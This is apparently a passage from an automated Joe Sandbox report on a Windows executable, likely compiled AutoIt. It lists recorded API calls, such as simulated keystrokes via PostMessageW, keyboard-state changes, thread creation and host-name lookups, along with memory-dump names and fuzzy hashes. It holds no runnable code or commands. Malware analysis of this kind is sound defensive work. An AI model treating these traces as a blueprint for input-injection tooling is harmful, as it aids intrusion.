                                                                                                                                                                                                                                                                              • Part of subcall function 00C54393: GetWindowThreadProcessId.USER32(?,00000000), ref: 00C543AD
                                                                                                                                                                                                                                                                              • Part of subcall function 00C54393: GetCurrentThreadId.KERNEL32 ref: 00C543B4
                                                                                                                                                                                                                                                                              • Part of subcall function 00C54393: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00C52F00), ref: 00C543BB
                                                                                                                                                                                                                                                                            • MapVirtualKeyW.USER32(00000025,00000000), ref: 00C52F0A
                                                                                                                                                                                                                                                                            • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00C52F28
                                                                                                                                                                                                                                                                            • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 00C52F2C
                                                                                                                                                                                                                                                                            • MapVirtualKeyW.USER32(00000025,00000000), ref: 00C52F36
                                                                                                                                                                                                                                                                            • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00C52F4E
                                                                                                                                                                                                                                                                            • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 00C52F52
                                                                                                                                                                                                                                                                            • MapVirtualKeyW.USER32(00000025,00000000), ref: 00C52F5C
                                                                                                                                                                                                                                                                            • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00C52F70
                                                                                                                                                                                                                                                                            • Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 00C52F74
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
• Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 2014098862-0
                                                                                                                                                                                                                                                                            • Opcode ID: 699b701532a589799da580f0d49109b16f0834c55b60ea2b520f77a68209cf2c
                                                                                                                                                                                                                                                                            • Instruction ID: 09301d8e16f23b3922e29bc634bf51e6743f1f5fbc5e8bb76adddb162a8d15ce
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 699b701532a589799da580f0d49109b16f0834c55b60ea2b520f77a68209cf2c
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D501B5306842147BFB106B699C8EF5D3F59DF4EB12F100011F719AE1E4C9E164849BAD
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,00C51D95,?,?,00000000), ref: 00C52159
                                                                                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000,?,00C51D95,?,?,00000000), ref: 00C52160
                                                                                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00C51D95,?,?,00000000), ref: 00C52175
                                                                                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(?,00000000,?,00C51D95,?,?,00000000), ref: 00C5217D
                                                                                                                                                                                                                                                                            • DuplicateHandle.KERNEL32(00000000,?,00C51D95,?,?,00000000), ref: 00C52180
                                                                                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00C51D95,?,?,00000000), ref: 00C52190
                                                                                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(00C51D95,00000000,?,00C51D95,?,?,00000000), ref: 00C52198
                                                                                                                                                                                                                                                                            • DuplicateHandle.KERNEL32(00000000,?,00C51D95,?,?,00000000), ref: 00C5219B
                                                                                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,00C521C1,00000000,00000000,00000000), ref: 00C521B5
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1957940570-0
                                                                                                                                                                                                                                                                            • Opcode ID: bc1967ca6a350d4981119ec3ab3996b9deff26f6e2582f574c7553bd0b323857
                                                                                                                                                                                                                                                                            • Instruction ID: 2d4870029922c93d6f12e80c7e667b9cd9944e51a15b4a1436bac4503e3abcd9
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: bc1967ca6a350d4981119ec3ab3996b9deff26f6e2582f574c7553bd0b323857
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8201A8B5240304BFE610ABA5EC8DF6F7BACEB89711F004411FA05DB1E1CA709C04CB24
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00C843C1
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 00C843D6
                                                                                                                                                                                                                                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00C843F0
                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00C84435
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001057,00000000,?), ref: 00C84462
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00C84490
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: MessageSend$Window_wcslen
                                                                                                                                                                                                                                                                            • String ID: SysListView32
                                                                                                                                                                                                                                                                            • API String ID: 2147712094-78025650
                                                                                                                                                                                                                                                                            • Opcode ID: 6dab1739a877a4a31cc5006bad49575d0b66a8c9ec86d2201bb8460ee99d1119
                                                                                                                                                                                                                                                                            • Instruction ID: 8ed74177c2bdedd797f5c95bee3de87c310f2db90cda7a2e69a4358470cc82b6
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6dab1739a877a4a31cc5006bad49575d0b66a8c9ec86d2201bb8460ee99d1119
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5441D071900319ABDF25AFA4CC49FEE7BA9FF48364F100126F914E7291D7709980DB94
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00C5C6C4
                                                                                                                                                                                                                                                                            • IsMenu.USER32(00000000), ref: 00C5C6E4
                                                                                                                                                                                                                                                                            • CreatePopupMenu.USER32 ref: 00C5C71A
                                                                                                                                                                                                                                                                            • GetMenuItemCount.USER32(01586E98), ref: 00C5C76B
                                                                                                                                                                                                                                                                            • InsertMenuItemW.USER32(01586E98,?,00000001,00000030), ref: 00C5C793
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Menu$Item$CountCreateInfoInsertPopup
                                                                                                                                                                                                                                                                            • String ID: 0$2
                                                                                                                                                                                                                                                                            • API String ID: 93392585-3793063076
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • LoadIconW.USER32(00000000,00007F03), ref: 00C5D1BE
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
• Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: IconLoad
                                                                                                                                                                                                                                                                            • String ID: blank$info$question$stop$warning
                                                                                                                                                                                                                                                                            • API String ID: 2457776203-404129466
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
• Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
                                                                                                                                                                                                                                                                            • String ID: 0.0.0.0
                                                                                                                                                                                                                                                                            • API String ID: 642191829-3771769585
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
• Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: _wcslen$LocalTime
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 952045576-0
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,00C339E2,00000004,00000000,00000000), ref: 00C0FC41
                                                                                                                                                                                                                                                                            • ShowWindow.USER32(FFFFFFFF,00000006,?,00000000,?,00C339E2,00000004,00000000,00000000), ref: 00C4FC15
                                                                                                                                                                                                                                                                            • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,00C339E2,00000004,00000000,00000000), ref: 00C4FC98
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
• Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ShowWindow
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1268545403-0
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • DeleteObject.GDI32(00000000), ref: 00C837B7
                                                                                                                                                                                                                                                                            • GetDC.USER32(00000000), ref: 00C837BF
                                                                                                                                                                                                                                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00C837CA
                                                                                                                                                                                                                                                                            • ReleaseDC.USER32(00000000,00000000), ref: 00C837D6
                                                                                                                                                                                                                                                                            • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00C83812
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00C83823
                                                                                                                                                                                                                                                                            • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00C86504,?,?,000000FF,00000000,?,000000FF,?), ref: 00C8385E
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00C8387D
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
• Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 3864802216-0
                                                                                                                                                                                                                                                                            • Opcode ID: ec988b551dcda1dd02bee353bdc21203212505f5cc8ded1bd63f742948ca4891
                                                                                                                                                                                                                                                                            • Instruction ID: 800b5c35682f74dd1a3c12abb4b542250f28b6d6a0ae0f85301a85ea316b11dc
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ec988b551dcda1dd02bee353bdc21203212505f5cc8ded1bd63f742948ca4891
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8531CE72200224BFEB118F50DC89FEB3BADEF09B25F040025FE099A2D1D6B59D41C7A8
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID: NULL Pointer assignment$Not an Object type
                                                                                                                                                                                                                                                                            • API String ID: 0-572801152
                                                                                                                                                                                                                                                                            • Opcode ID: a56ed5a8442028eb42e7d9cf863a047f7daab116f2d8bc209f1c2ada674ecfe5
                                                                                                                                                                                                                                                                            • Instruction ID: 33ffac5e265370d8bdae02ab4c8e4c55b1108fae53a620a772ee73e2bc65ac64
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a56ed5a8442028eb42e7d9cf863a047f7daab116f2d8bc209f1c2ada674ecfe5
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A2D1A075A0060A9FDF10CF68C885BAEB7B5FF48344F14C569E919AB281E7B0EE45CB50
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetCPInfo.KERNEL32(00000000,00000000,?,7FFFFFFF,?,?,00C31B7B,00000000,00000000,?,00000000,?,?,?,?,00000000), ref: 00C3194E
                                                                                                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00C31B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 00C319D1
                                                                                                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00C31B7B,?,00C31B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 00C31A64
                                                                                                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00C31B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 00C31A7B
                                                                                                                                                                                                                                                                              • Part of subcall function 00C23B93: RtlAllocateHeap.NTDLL(00000000,?,?,?,00C16A79,?,0000015D,?,?,?,?,00C185B0,000000FF,00000000,?,?), ref: 00C23BC5
                                                                                                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,00C31B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 00C31AF7
                                                                                                                                                                                                                                                                            • __freea.LIBCMT ref: 00C31B22
                                                                                                                                                                                                                                                                            • __freea.LIBCMT ref: 00C31B2E
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 2829977744-0
                                                                                                                                                                                                                                                                            • Opcode ID: ea5fbf245e0dadbf2d67bee135ae2279b64fedcf61856aa6e9bcc25bd670e4f0
                                                                                                                                                                                                                                                                            • Instruction ID: 5d21fd32287496ef7b570b630489301d0a5118d263ace5c6eb57d01985e7f2f1
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ea5fbf245e0dadbf2d67bee135ae2279b64fedcf61856aa6e9bcc25bd670e4f0
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E091C472E202569FDB208E65CC91BEEBBB59F09314F1C0569EC15E7280EB35DE41D760
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Variant$ClearInit
                                                                                                                                                                                                                                                                            • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                                                                                                                                                                                                                            • API String ID: 2610073882-625585964
                                                                                                                                                                                                                                                                            • Opcode ID: 53fb12207f0ce64c21cb3b8ccab063e05db3a7b205f9229a430e77d830f3e8db
                                                                                                                                                                                                                                                                            • Instruction ID: 56071f2f6b45150aa46b13b8d7278e4f805826dfed5ce2eb9e122d10c3736aa8
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 53fb12207f0ce64c21cb3b8ccab063e05db3a7b205f9229a430e77d830f3e8db
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0891A171A00619ABDF20CFA5CC48FEEBBB8EF45715F108559F519AB280D7B09A45CFA0
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • SafeArrayGetVartype.OLEAUT32(00000000,?), ref: 00C61C1B
                                                                                                                                                                                                                                                                            • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00C61C43
                                                                                                                                                                                                                                                                            • SafeArrayUnaccessData.OLEAUT32(00000000), ref: 00C61C67
                                                                                                                                                                                                                                                                            • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00C61C97
                                                                                                                                                                                                                                                                            • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00C61D1E
                                                                                                                                                                                                                                                                            • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00C61D83
                                                                                                                                                                                                                                                                            • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00C61DEF
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ArraySafe$Data$Access$UnaccessVartype
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 2550207440-0
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • VariantInit.OLEAUT32(?), ref: 00C743C8
                                                                                                                                                                                                                                                                            • CharUpperBuffW.USER32(?,?), ref: 00C744D7
                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00C744E7
                                                                                                                                                                                                                                                                            • VariantClear.OLEAUT32(?), ref: 00C7467C
                                                                                                                                                                                                                                                                              • Part of subcall function 00C6169E: VariantInit.OLEAUT32(00000000), ref: 00C616DE
                                                                                                                                                                                                                                                                              • Part of subcall function 00C6169E: VariantCopy.OLEAUT32(?,?), ref: 00C616E7
                                                                                                                                                                                                                                                                              • Part of subcall function 00C6169E: VariantClear.OLEAUT32(?), ref: 00C616F3
                                                                                                                                                                                                                                                                            Strings
Memory Dump Source
• Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
• Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
                                                                                                                                                                                                                                                                            • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                                                                                                                                                                                                                            • API String ID: 4137639002-1221869570
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 00C508FE: CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,00C50831,80070057,?,?,?,00C50C4E), ref: 00C5091B
                                                                                                                                                                                                                                                                              • Part of subcall function 00C508FE: ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00C50831,80070057,?,?), ref: 00C50936
                                                                                                                                                                                                                                                                              • Part of subcall function 00C508FE: lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00C50831,80070057,?,?), ref: 00C50944
                                                                                                                                                                                                                                                                              • Part of subcall function 00C508FE: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00C50831,80070057,?), ref: 00C50954
                                                                                                                                                                                                                                                                            • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,00000001,?,?), ref: 00C756AE
                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00C757B6
                                                                                                                                                                                                                                                                            • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 00C7582C
                                                                                                                                                                                                                                                                            • CoTaskMemFree.OLE32(?), ref: 00C75837
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: FreeFromProgTask$CreateInitializeInstanceSecurity_wcslenlstrcmpi
                                                                                                                                                                                                                                                                            • String ID: NULL Pointer assignment
                                                                                                                                                                                                                                                                            • API String ID: 614568839-2785691316
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetMenu.USER32(?), ref: 00C82C1F
                                                                                                                                                                                                                                                                            • GetMenuItemCount.USER32(00000000), ref: 00C82C51
                                                                                                                                                                                                                                                                            • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00C82C79
                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00C82CAF
                                                                                                                                                                                                                                                                            • GetMenuItemID.USER32(?,?), ref: 00C82CE9
                                                                                                                                                                                                                                                                            • GetSubMenu.USER32(?,?), ref: 00C82CF7
                                                                                                                                                                                                                                                                              • Part of subcall function 00C54393: GetWindowThreadProcessId.USER32(?,00000000), ref: 00C543AD
                                                                                                                                                                                                                                                                              • Part of subcall function 00C54393: GetCurrentThreadId.KERNEL32 ref: 00C543B4
                                                                                                                                                                                                                                                                              • Part of subcall function 00C54393: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00C52F00), ref: 00C543BB
                                                                                                                                                                                                                                                                            • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00C82D7F
                                                                                                                                                                                                                                                                              • Part of subcall function 00C5F292: Sleep.KERNEL32 ref: 00C5F30A
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 4196846111-0
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • IsWindow.USER32(00000000), ref: 00C88992
                                                                                                                                                                                                                                                                            • IsWindowEnabled.USER32(00000000), ref: 00C8899E
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,0000041C,00000000,00000000), ref: 00C88A79
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,000000B0,?,?), ref: 00C88AAC
                                                                                                                                                                                                                                                                            • IsDlgButtonChecked.USER32(?,00000000), ref: 00C88AE4
                                                                                                                                                                                                                                                                            • GetWindowLongW.USER32(00000000,000000EC), ref: 00C88B06
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00C88B1E
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
• Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 4072528602-0
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetParent.USER32(?), ref: 00C5B8C0
                                                                                                                                                                                                                                                                            • GetKeyboardState.USER32(?), ref: 00C5B8D5
                                                                                                                                                                                                                                                                            • SetKeyboardState.USER32(?), ref: 00C5B936
                                                                                                                                                                                                                                                                            • PostMessageW.USER32(?,00000101,00000010,?), ref: 00C5B964
                                                                                                                                                                                                                                                                            • PostMessageW.USER32(?,00000101,00000011,?), ref: 00C5B983
                                                                                                                                                                                                                                                                            • PostMessageW.USER32(?,00000101,00000012,?), ref: 00C5B9C4
                                                                                                                                                                                                                                                                            • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00C5B9E7
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
• Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmp
